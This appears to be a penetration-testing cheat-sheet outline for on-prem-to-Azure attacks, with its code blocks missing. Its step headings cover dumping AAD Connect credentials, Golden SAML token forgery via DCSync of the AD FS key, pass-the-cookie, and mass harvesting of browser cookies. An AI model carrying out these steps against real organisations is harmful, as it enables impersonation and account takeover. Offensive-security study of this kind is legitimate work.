On-Prem → Cloud
Dumping AAD Connect Creds
Tools
Forging AD FS SAML Tokens (Golden SAML)
Install AADInternals v0.9.3:
Check if Azure is configured as a party trust:
Get AD FS config:
Get private key object GUID:
Ensure you have enough privileges to DCSync:
DCSync the key:
We don't actually need clear-text creds to replicate the key if we've already imported a privileged TGT, so $Credentials (here, C:\Program Files\WindowsPowerShell\Modules\AADInternals\0.9.3\DRS_Utils.ps1) can be omitted.
Generate the token signing certificate:
Get AD FS trust issuer as well as on-prem users' immutable cloud IDs:
Generate forged SAML request-response for WS-Federation (SOAP-based) protocol interchange:
Generate forged SAML request-response for SAML 2.0 (XML-based) protocol interchange:
Generate forged SAML request-response, impersonate and login:
Pass-the-Cookie
Refresh Token from ESTSAuth* Cookies
Automated with TokenTacticsV2:
Mass Cookies Harvesting
Collect with dploot and decrypt with a backup key (similar to HEKATOMB):
Search for ESTSAUTHPERSISTENT cookies:
Mass Hidden Directories Searching
Impacket's smbclient.py extension (searches for hidden directories in every user's home):
Collect hidden directories:
Search for hidden directories that start with .az:
Last updated